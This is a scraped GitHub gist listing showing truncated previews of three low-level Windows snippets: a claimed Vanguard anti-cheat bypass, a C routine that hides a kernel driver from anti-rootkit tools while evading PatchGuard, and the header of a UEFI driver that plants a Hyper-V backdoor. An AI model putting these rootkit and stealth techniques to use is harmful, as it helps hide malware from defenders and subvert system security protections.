Skip to content

Instantly share code, notes, and snippets.

View kuh4it's full-sized avatar

risku kuh4it

View GitHub Profile
@kuh4it
kuh4it / vgm_ctx_stripped.hpp
Last active January 26, 2024 22:05
my CPU's temperature is too high
//
// <function>
// VgmCtx::BlockSwapContextHooks()
// </function>
// <purpose>
// Prevent all vanguard TLB flushing and PML4 page remapping/copying routines in 9 lines
// by setting a thermal sensor interrupt, not registered within the IDT directly
// </purpose>
//
VOID BlockSwapContextHooks()
@typcn
typcn / drvhider.c
Last active January 4, 2024 15:06
Hide Driver from ARK tools ( win7 -- win10 x64, patchguard safe )
VOID DrvObjHide(_In_ PVOID Context) {
// Wait the driver fully loaded
NTSTATUS status = STATUS_SUCCESS;
INT64 interval = 1000 * -10000i64;
status = KeDelayExecutionThread(KernelMode,FALSE,(PLARGE_INTEGER)&interval);
PDRIVER_OBJECT driver_object = (PDRIVER_OBJECT)Context;
tMiProcessLoaderEntry fun = (tMiProcessLoaderEntry)FindMiProcessLoaderEntry();
// MiProcessLoaderEntry will remove your driver from PsLoadedModuleList, and the patchguard moniting context.
// So it won't trigger a BSOD
@Cr4sh
Cr4sh / DmaHvBackdoor.c
Last active January 23, 2024 22:31
Hyper-V backdoor for UEFI
/*
*********************************************************************
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which being called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)